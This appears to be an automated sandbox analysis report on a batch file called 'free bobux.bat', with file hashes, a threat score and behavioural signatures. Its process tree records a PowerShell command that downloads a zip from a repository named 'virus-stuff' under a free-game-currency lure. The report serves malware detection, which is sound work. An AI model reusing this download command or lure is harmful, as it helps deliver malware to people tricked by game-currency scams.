Analysis
-
max time kernel
1563s -
max time network
1563s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
28/05/2024, 13:49
Static task
static1
Behavioral task
behavioral1
Sample
free bobux.bat
Resource
win7-20231129-en
4 signatures
1800 seconds
Behavioral task
behavioral2
Sample
free bobux.bat
Resource
win10v2004-20240426-en
5 signatures
1800 seconds
General
-
Target
free bobux.bat
-
Size
856B
-
MD5
9b52f6b0533f05686ed29b63a12a88b3
-
SHA1
25cf52a9a62253bc6566946dfac5d119e70b24f3
-
SHA256
7dc767c9996b5bcf4ecfec32ae92a66ee7eb92d85ca8fa294872a5890adf467f
-
SHA512
dcf6e90c06ce2bf65141ec1e0979fae9b2f8bfe8f6d0ee88028f691045d6ca59f0fba51df78c92453abd0f5208ef925752b920f80751bfca2726f71f9ae7e97b
Score
8/10
Malware Config
Signatures
-
pid Process 2992 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2992 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1276 wrote to memory of 2992 1276 cmd.exe 29 PID 1276 wrote to memory of 2992 1276 cmd.exe 29 PID 1276 wrote to memory of 2992 1276 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\free bobux.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992
-